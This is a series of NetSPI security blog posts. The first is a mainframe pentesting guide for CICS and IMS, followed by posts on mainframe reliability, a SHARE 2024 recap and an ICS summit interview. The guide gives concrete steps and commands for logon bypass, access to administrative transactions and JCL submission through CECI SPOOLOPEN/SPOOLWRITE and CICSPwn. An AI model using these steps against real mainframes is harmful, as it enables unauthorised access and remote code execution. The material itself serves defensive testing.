It is estimated that over 90% of mainframes in use today implement CICS for transaction management and it is more critical than ever for practitioners to invest in the security of these trusted environments.

What is Customer Information Control System (CICS)? 

The Customer Information Controls System, commonly known as CICS, is a transaction processing system originally developed by IBM in 1968 to deal with the limitations of traditional batch system tasks that needed access to the same resources (datasets, directories, etc.) at the same time. CICS has evolved over time to find prolific use in modern banking, insurance, retail, government, and other critical industries.  

Key features of CICS 

• Deployed on z/OS and z/VSE to provide an environment for transaction management 
• A middleware-like mixed-language application server that is often referred to as a region  
• Handles communications between user interfaces (e.g., terminals or web interfaces) and backend databases or services (DB2, SOAP, REST, RACF) 
• Processes large volumes of online transactions* rapidly and with high reliability. 

Summarily, CICS is responsible for managing real-time transactions on mainframes. 

* A CICS transaction is a unit of processing initiated by a single request that may affect one or more objects 

What is Information Management System (IMS)?

IMS (Information Management System) is a hierarchical database and transaction management system for mainframes. Also developed by IBM, IMS is widely used in finance, telecommunications, and retail industries for high-volume transaction processing and data management. 

Two primary components 

• The IMS DB (Database Manager) is a structured, non-relational database management system. It is optimized for fast access to large volumes of data, making it suitable for high-throughput environments.
• IMS TM (Transaction Manager) is used to control execution of transactions. It facilitates concurrent and reliable processing of real-time transactions in a queue-based system and handles communication between end users and applications accessing IMS DB. 

In short, IMS is a hierarchical database and real-time transaction processing solution for mainframes. 

Let’s now take a look at the following vulnerabilities within CICS and IMS applications and explore the accompanying tools and methods that may be used to discover them. All examples are based on real-world findings identified in NetSPI-conducted penetration tests.  

1. Unencrypted Transmission of Data
2. Insecure Password Policies
3. Hidden Fields Exploitation
4. Protected Fields Manipulation
5. Access To Administrative Transactions
6. Unauthenticated Access to Transactions
7. Remote Code Execution

1. Unencrypted Transmission of Data 

Weakness 

If the CICS region resides on an LPAR that uses unencrypted protocols, data transmitted will be susceptible to attacker-in-the-middle attacks. Any sensitive data intercepted will be in plaintext and entirely unencrypted, making it much easier for rapid theft of data to occur. Unencrypted ports frequently seen in use on mainframes are FTP/21 and Telnet/23 for TN3270. These insecure services could also potentially run on any port number depending on network configurations in use.

Test 

To investigate, conduct a basic Nmap port scan of the CICS IP address to help determine if insecure ports are in use.

In the Nmap results seen above, unencrypted Telnet over port 23 and unencrypted FTP over port 21 are permitted for use. Insecure protocols such as Telnet or FTP transmit data in plaintext that if intercepted is easily readable.

2. Insecure Password Policies

Weakness 

When authentication to CICS applications requires a low-level of password complexity, the ability for an attacker to successfully brute-force valid passwords becomes much more of a threat. 

Test 

Investigate password policies by checking for sufficient complexity or modifying what is submitted during authentication to test if validation is adequately secure. 

1. Connect to the appropriate CICS or IMS region for the test. 
2. At the logon command prompt, input a valid password but using invalid mixed case. For example, if the password is Netspi27, submit nETSPI27.

3. If the session logs on successfully, passwords are insensitive to mixed-case submissions. 

Weak passwords may arise in situations like the example shown above in which mixed case submissions are improperly validated. Another common scenario is allowing passwords that consist of less than 8 characters. When weak passwords are located alongside something like user enumeration (via differences in error messages or other means), the time it would take to brute force entire credential sets is dramatically reduced. 

3. Hidden Fields Exploitation  

Weakness  

With the use of recently developed open-source tools like Hack3270, hidden fields within mainframe applications may be susceptible to unintended information disclosure or transaction and record manipulation. 

Test  

Utilize Hack3270 (https://github.com/gglessner/hack3270) to examine various CICS screens to see if additional functionality or information might be discovered. 

1. Connect to your test IP with a mainframe emulator, such as x3270. 
2. Launch the Hack3270 tool with the following command:

./hack3270.py [IP] [port] -t -d 

3. A proxy listener will be established over port 3271. Connect to the proxy with x3270 and select “Click to Continue.”

X3270 Connection pending

X3270 Connected

After submitting “Click to Continue” 

4. Complete any required authentication steps.
5. Navigate to various transactions within the application, toggling the Hack Fields button between OFF and ON to see if hidden fields might be discovered.

6. In the example below an editable field that grants transaction permissions has been uncovered.

6. This scenario illustrates how it may be possible to unhide fields designed to permit specific authorized actions within the context of a mainframe application transaction screen. 

4. Protected Fields Manipulation 

Weakness 

In addition to hidden fields, locked or protected fields within CICS screens may also be vulnerable to data or transaction tampering. 

Test: 

1. Follow steps 1-4 in the above example. 
2. Locate a transaction that is disallowed for the authenticated user.

3. With Hack Fields toggled to ON, take note of the locked Delete Order History transaction.

4. Submit the transaction. If it completes successfully, the application is vulnerable to manipulation of protected fields.

When locked fields are implemented as a means of security control, reviewing whether the configurations are susceptible to bypass with modern tooling is incredibly important.  

5. Access To Administrative Transactions 

Weakness 

Users should only be granted access to the transactions they require for the specific duties of their role. Administrative transactions, such as CEMT, would allow an attacker to profile an entire CICS region and potentially disable transactions used for critical business functions.  

Test 

1. Authenticate to the application as a lower-privileged user
2. Clear the screen
3. Input the transaction codes as seen below to determine whether a regular user is able to access or perform transactions that should require higher permission levels. 

Examples 

CICS:  

• CEMT INQ TRAN to display all transactions 
• CECI START TRANSID('tranname') to execute a command in the region and display the result 

IMS:  

• /DIS DB [dbname] to display the status of a database 
• /DIS TRAN [tranname] to display the status of a transaction  

If these transactions run for low-level users, access controls may need to be reassessed and reconfigured more appropriately for improved security. 

6. Unauthenticated Access to Transactions 

Weakness 

When accessing CICS transactions authentication is required. However, if access controls are misconfigured, some bypasses may be possible. This can result in completely unauthenticated transaction processing. 

Test 

Exit authentication workflows during various stages of the process. Once exited, test to see if it is possible to submit CICS or IMS commands without authentication. 

1. Connect to the IP and port for the test. Input the appropriate command (i.e. DIMS) to reach the authentication screen.
2. Input PF2 or another assigned key to exit the logon screen before completing authentication. Open the keyboard icon in an emulator or use your physical keyboard to do this, depending on how the region has been accessed. 
3. Once the log on process has been terminated, attempt to enter a CICS or IMS transaction number (ex:CECI) and select Enter. 

If any CICS or IMS transactions run at this point, authentication controls have been successfully bypassed. 

7. Remote Code Execution  

Weakness 

As mentioned earlier, CECI is a CICS command (command-level interpreter transaction) that is active by default but ideally should be disabled. CECI is an interface for CICS region APIs known as CICS Commands, one of these being the SPOOLOPEN transaction used to facilitate job submission to the internal JES2 reader. SPOOLOPEN may permit users to generate reverse shells with only limited access to CICS. 

Test 

1. Connect to the CICS region. If presented with a CESN logon screen, select F3 to exit.
2. Enter CECI on the screen
3. Using the SPOOLWRITE and variable features of CECI, submit JCL. This can be accomplished with the following CECI command: 
   CECI SPOOLOPEN OUTPUT USERID('INTRDR  ') NODE('LOCAL') TOKEN(&TOKTEST)
4. Create a variable in CECI and use the command below to write the JCL to the internal reader, one line at a time: 
   SPOOLWRITE TOKEN('TOKEN') FROM(&SQLKHDS) FLENGTH(80)
5. When the job is submitted it will run at the same permission level as the CICS default user 
6. This can be automated with CICSPwn as a single command: python cicspwn.py -a APPLID -s custom --jcl /tmp/temp.jcl HOST/IP PORT 

This bypass essentially grants an unauthenticated user the ability to submit JCL to the internal reader, which opens the door for many more compromises. Reverse shells on the mainframe could be established through this attack, potentially handing total control of mainframe resources over to an anonymous user. 

Conclusion 

Though CICS and IMS applications have been in use for many years, new penetration testing tools and methodologies are still uncovering previously unknown weaknesses in mainframe environments. From simple access control issues to total mainframe compromise, the range of potential threats for mainframes are as varied as those found against any other system or network.

Methodical techniques, frequent testing, and thorough reviews of controls from a creative mindset are all ways to help protect the attack-surface landscape of these critical systems.

For additional support, follow our technical updates on the NetSPI Hack Responsibly blog, review presentations given by our team at various events including DEFCON, BSides, SHARE, and others (Phil Young/Soldier of FORTRAN, David Bryan/VideoMan, Michelle Eggers), and keep an eye out for new open-source tooling that can assist in your mainframe testing activities.  

To learn more about NetSPI Mainframe Pentesting, please visit: https://www.netspi.com/netspi-ptaas/network-penetration-testing/mainframe/ 

CICS Pentesting Resources 

• Hack3270 – Tool used to unhide fields, unlock fields, submit keypresses, and log activity 
• Damn Vulnerable CICS Application – Test environment to explore vulnerabilities 
• CICSPwn – Pentesting tool used for reconnaissance, automation, and exploitation 

The post Hacking CICS: 7 Ways to Defeat Mainframe Applications appeared first on NetSPI.

The average latte-enjoyer is not typically going to consider the hops a payment request will make as it travels from tap to bank. It was my personal delight to discover that the most crucial transaction processing technology, capable of handling up to 1 trillion web transactions daily, is mainframes.

The first iteration was created for the US Navy Bureau of Ships in 1937, with commercialization taking place in 1951 under the Eckert-Mauchly Computer Corporation, and the first modern IBM System/360 reaching the market in 1965. In 1970 we saw magnetic ferrite cores replaced by silicon memory chips, but by 1991 as other technologies accelerated, the end of the mainframe era was predicted to occur only a few short years later.

We are now two decades beyond the expiration date given to mainframe computers, yet the financial industry is still largely held up by these servers, as well as government agencies, healthcare organizations, and other institutions with mission-critical systems requiring high reliability.

Entities like the NYSE or NASDAQ stock exchange must have no more than 5.26 minutes of downtime per year to avoid the impact of negative economic consequences, equating to what we call five nines of availability. This level of reliability is something only mainframe can provide.

Why Mainframe 

It is understood that mainframe computers are still in use today, but how are they different from other transaction-focused machines? Mainframes are relied upon for exemplary performance in three primary areas: reliability, availability, and serviceability (RAS).  

Reliability and Availability 

Mainframes are built tough! A recent 4.8 magnitude earthquake in New York state shook a corporate campus housing over 200 mainframes, none of which were affected by the groundbreaking event. Mainframe boxes are built to handle shock and vibrations, and may even include seismic isolation systems around the mainframes to protect them further. In fact, IBM implements standard testing that simulates the rough shaking a magnitude seven earthquake would produce.

Within a mainframe computer, built-in redundancy is another major benefit that can be found at various hardware levels, including processors, memory, power supplies, and I/O paths. As an example, the IBM z15 features up to 190 configurable cores across all processors. This contrasts with externally hosted storage and processing solutions, such as a distributed cloud environment like Amazon’s Aurora, wherein the redundancy occurs across multiple locations instead of natively within a single dedicated physical device.  

To prevent downtime, mainframes employ error-detection and correction like error-checking code (ECC) memory to detect and correct data corruption. Mainframe has been adept for many years in virtualization for efficient hardware utilization and process isolation and now incorporates comprehensive system management tools to continuously monitor performance for failure prediction. These monitoring tools can initiate preventive measures as well, like automatically switching workloads to backup systems for extra reliability assurance. 

Even the software running on these computers is specifically engineered for high reliability. Able to support things like transaction rollback, checkpoint restart, and complex job scheduling, mainframe systems maintain operation in adverse conditions that would otherwise knock competing options down.  

Serviceability 

It may seem that mainframes would be more complex to maintain than smaller systems, but there are actually some great ease-of-use features supported.  

Mainframe computers are modular by design, so repairs and upgrades are less complicated and time consuming. Individual components (processors, disk drives, memory cards) can be swapped out with no impact to the overall system. This is huge when we remember the downtime limitations of certain industries being about five minutes maximum per year; repair time counts as downtime when it impacts the ability to complete required tasks. 

Modern systems are also equipped with thorough logging that can be used to support advanced diagnostic tools, and remote management access is available for updates and troubleshooting at will. A mainframe box hosted on-site also means access to physical repairs or updates is owned wholly by the organization employing the machine, a solid benefit to those requiring tightly controlled access to their business-critical systems.

Something to consider regarding serviceability with mainframe computers, however, is the specialized nature of the technology. Though they are not so far removed from other transaction-focused servers, there is a known mainframe practitioner shortage. This is a result of many organizations assuming mainframes would be fully sunset by the mid-1990s, effectively causing a reduction in funding for new hires and training programs. Though some organizations are now working to address this gap, businesses that employ mainframes for mission-critical processes would be wise to enlist the support of the greater mainframe security community to help ensure all bases are covered and defense-in-depth is being achieved.

What’s Next  

The Artificial Intelligence revolution has been underway for several years now and is advancing rapidly — and the continued expansion and maturation of cloud-based business solutions for storage and processing show no indication of slowing. These technologies among others could be viewed as threats to mainframe, but the reality is no solution exists able to replace mainframe computers that is as private, as powerful, or as trustworthy. It is more likely we will see hybridization of cloud and mainframe environments, with native AI enhancements in place for use-cases like advanced fraud detection.

Modern mainframes incorporate crypto, network, and compression cards all with their own processors and memory. Integrated encryption for data at rest and in motion is standard for mainframes, a feature other servers simply do not have. Mainframes are not frozen in time either, with new innovations for native AI inferencing built into the processor cores themselves and further potential to host virtual private cloud environments or proprietary LLMs, there is a healthy future in store for mainframes. 

Beginning with a basic purchase, your payment transaction data traveled from the vendor eventually to a mainframe, and from there made it back to your bank records. Perhaps the next time you tap for a latte, you’ll consider the backbone infrastructure making your debit card worth more than the thin rectangle of plastic it consists of, meaningless without the machines transmitting and processing some of your most sensitive data across time and space. 

The post Mission for Mainframe | Part 1: Relevant Today appeared first on NetSPI.

Mainframe is happening now!

While most people may imagine mainframe computers to be an antiquated world of massive machinery, tape spools, and limited possibilities, they actually receive widespread use today in 2024 as the backbone infrastructure that allows billions of financial transactions to occur daily on a global scale.

Government entities can store and retrieve sensitive data with extremely high reliability and almost nonexistent downtime, and other sectors like healthcare, insurance, and utilities can meet the speed of demand by processing multiple terabytes of data with incredible ease, and consistency.

Mainframe computers have a wonderfully rich history that spans decades, and as such there have been many groups over the years that bring practitioners, vendors, and resource owners together for collaboration. SHARE, with an inauguration year of 1955, is the oldest and most well-known of these organizations — if you work in mainframe, you know about SHARE! It began as the first IT Enterprise group ever to form within the United States and has been operating continuously since, through industry publications, annual conferences, trainings, and ongoing opportunities to connect.

I had the pleasure of attending this year’s SHARE Orlando 2024 where I learned about the state of mainframe security today and the in-demand skills needed to protect these critical systems. Here’s what I thought of my time at the event.

Mainframe Penetration Testing is a Scarce Skillset 

SHARE Orlando 2024 was the first time I had the opportunity to experience a mainframe event, and it was an excellent introduction to the mainframe community at large with representation from organizations worldwide occupying the mainframe space. NetSPI was the only US-based proactive security consulting firm present, and I found myself engaged in multiple conversations on mainframe security as it relates to new integrations with data lakes, analytics platform, blockchain, and AI.

Also under frequent discussion were developments in hosted cloud computing, quantum cryptography, web applications on mainframe, and mainframe ethical hacking in general. I realized during my time at SHARE that there are currently very few dedicated ethical hackers working in mainframe; the arena is in great need of this skillset, and I was deeply encouraged to continue building my individual mainframe knowledge while contributing to the development of our expanding Mainframe Penetration Testing service line here at NetSPI.

IBM z/OS is the Most Popular 

IBM z/OS is by far the most common operating system you will find in use on mainframe today, and I was intrigued by a product IBM recently released called WatsonX AI. It makes use of foundational models and generative AI to assist with code translation from COBOL to Java for increased interoperability, and also makes it possible for businesses to train and deploy custom AI capabilities across the enterprise environment while maintaining full control of the data they own.

I also learned so much at both talks given by Philip Young, NetSPI’s Mainframe Director. At his first talk, entitled “Hacking CICS Applications: New Attacks on Old Screens”, the collaborative nature of SHARE was seen in full force as he was met with a great deal of feedback from the audience throughout the duration of the presentation. The talk covered an introduction to hack3270, a tool used to assist in CICS application pentesting, and certainly made an impression on the crowd… especially vendors and developers who had some new things to consider regarding the security of their CICS environments.

Philip’s second talk, “No Longer a Myth: A Guide to Mainframe Buffer Overflows”, was also well-received by the audience. A specific attack that for years many believed to be impossible was brought to light with a clear demo on how exactly this vulnerability can take place and some tips on ways to safeguard against buffer overflows on mainframe.

Finally, a talk given by Mark Wilson on the threat of ransomware within the mainframe environment. It was eye-opening for me as I personally was not aware of the native capability mainframe has for encrypting massive amounts of stored data within mere seconds. The fact that terabytes of mission-critical data could be encrypted in less than 12 minutes was a strong call to action for mainframe practitioners and owners alike to be aggressive with MFA requirements and tracking user behavior analytics.

Mainframe Security Is Mission-Critical 

I have a soft spot for mission-critical operations, legacy systems, and critical infrastructure. More specifically, I have a deep and abiding passion for the security of systems like mainframe that are heavily relied upon that do not frequently gain mainstream attention in the cybersecurity space. If we are relying on these computers, we must continuously work to protect them! Though they have been around for many years, new integrations and developments mean we will be faced with new potential vulnerabilities. All an attacker needs is one weakness to prevail, and these are the situations I am here to identify and report for eradication.

Check Out These Free Resources to Expand Your Mainframe Security Education 

There are some great talks available online, Philip has a fantastic list up (here and here are a few) covering many topics from the hacker perspective. IBM also hosts a free training program called IBM Z Xplore with hands-on interactive modules for learning to navigate and maximize z/OS use, as well as a networking platform called New to Z for burgeoning talent within any organization utilizing mainframe technology.

Overall, the experience at SHARE is a must-attend for those involved with or even just deeply fascinated by the world of mainframe. There is no other gathering of people with such passion and drive dedicated to this field. I was very pleased with the new information I was able to acquire and am so thankful for the connections I made among professionals and peers within the mainframe community.

See NetSPI’s technical research on Mainframe Penetration Testing by reading Philip’s article on Enumerating Users on z/OS with LISTUSER.

The post Mainframe Mania: Highlights from SHARE Orlando 2024  appeared first on NetSPI.

When daily activities go as planned, everyone carries on, but if things go awry, what can be a bad day for IT applications can mean taking an entire system offline in the ICS arena. In some cases, this can be hazardous to human safety and potentially cause environmental disasters. In fact, there’s an entire conference dedicated to ICS — and we’ve got the inside scoop. 

NetSPI Security Consultant Michelle Eggers earned a scholarship from Dragos and SANS to attend the ICS Security Summit & Training 2023. The summit is a deep dive into the field of ICS security, creating the space to share ideas, methods, and techniques for safeguarding critical infrastructure. We caught up with Michelle to share her experience and recap educational takeaways, memorable moments, and why ICS security is an important field of focus.  

Q&A with Michelle Eggers on ICS Security Summit & Training 2023 

1. How would you summarize your experience at the SANS ICS Security Summit 2023? 

The SANS ICS Summit was a phenomenal opportunity to undergo a crash-course into many foundational aspects of Operational Technology (OT) and the current trends surrounding the technologies used to support critical infrastructure worldwide.  

I had the opportunity to sit in on the beta rollout of the new SANS ICS 310 course and took away many valuable insights, such as a comparative analysis on the ways in which ICS and IT security concerns are similar, and the areas in which they differ dramatically.  

Each talk during the summit provided relevant, actionable information for ICS asset owners and operators with recommendations for navigating the current threat landscape. As a note, ransomware is by far the biggest concern facing the field at this time. In short, the conference presented zero filler and instead focused on rich information directly applicable to real-world scenarios.

2. What did you find most interesting in terms of tools used to secure ICS? 

Tooling wise, testing OT systems can be very similar to other types of penetration testing. The differences lie within the implementation. For example, Industrial Control Systems are often built on decades-old legacy hardware that may not be equipped to manage an active scan. In fact, something like a Nessus scan could easily knock out an entire system.  

While this situation may be a bad day for IT applications, in the ICS arena, taking a system offline can be hazardous to human safety and in extreme situations could even lead to an environmental disaster or loss of life.  

Cybersecurity for IT systems is built upon the CIA Triad model: Confidentiality, Integrity, and Availability. When working with operational technology, confidentiality is not the top priority; safety and availability instead play a much more crucial role. The impact goes beyond the potential loss or compromise of data or dollars and extends to potentially catastrophic effects in real-time, physical scenarios.  

3. How did you get introduced to ICS security? 

I first encountered the topic of ICS Security when I began my initial cybersecurity educational journey. It was not a large focus area but was mentioned in passing for general awareness purposes. I recall hearing at the time that air-gapped systems protect much of operational technology, but during the summit I came to understand that many OT systems are in fact networked and if there is an “air-gap” in place it is often a logical and not a physical separation, which as we know presents an opportunity for attacks that target bypassing security controls such as a misconfigured firewall. 

4. What makes you passionate about ICS security? 

Most people across the globe rely daily upon manufactured products or foods, critical infrastructure services (like healthcare), or utilities such as water or power to survive. The only way to escape the need for what OT provides us would be to live completely off grid, growing our own food, creating our own medicine, and so on.  

While this sounds ideal to some, the reality is very few people are actually living this way in industrialized countries. Industrial Control Systems are a crucial component of our daily lives whether we acknowledge it or not, and keeping these systems secure is of the utmost importance. 

5. Do you have a vision for how you could merge your pentesting skillset with operational technology (OT)? 

Ah, the dream! I would love to merge my existing interests in OSINT, Social Engineering, Physical Pentesting, and my current work in Web Application Penetration Testing with OT Pentesting into a well-rounded Red Team role that would assist organizations in securing their most vital assets in a multi-tiered and comprehensive approach.  

As far as OT testing branching out from Web App testing, many industrial control systems have some form of network connectivity that incorporates human-machine interfaces, and these can often present very similar vulnerabilities to IT systems regarding the authentication process. If forged remote authentication can be achieved to a workstation in control of a real-world, physical process you’ve got a very serious problem at hand. 

6. What tips do you have for security professionals looking to learn more about ICS security?  

Resources abound. Everything from YouTube to a basic browser search can provide a solid starting point for a better understanding of Operational Technology. I would recommend reading about the Colonial Pipeline cyberattack, studying up on Stuxnet and the Ukraine power grid attacks, and investigating any other infrastructure attacks of interest to gain a general idea of the OT landscape and what’s at stake.  

While at the conference I also had the opportunity to chat with Robert M. Lee, SANS ICS Fellow, who has put together a wonderful blog providing a list of resources for those interested in growing their knowledge base on ICS Cybersecurity, “A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity.” 

In addition, Dean Parsons has also released several free PDF resources on the subject, entitled “ICS Cybersecurity Field Manual” Volumes 1-3. These will also be available soon in a consolidated hardcopy edition as well. I managed to snag a signed first edition copy of his book at the Summit and it’s an excellent read, I wholeheartedly recommend adding it to any cybersecurity resource collection.  

If ICS security piques your interest, then you’ve got some reading to do! Connect with Michelle Eggers on LinkedIn for more OT insights and learn about NetSPI’s OT-centric offensive security services here.  

The post Q&A with Michelle Eggers: An Inside Look at the SANS ICS Security Summit 2023 appeared first on NetSPI.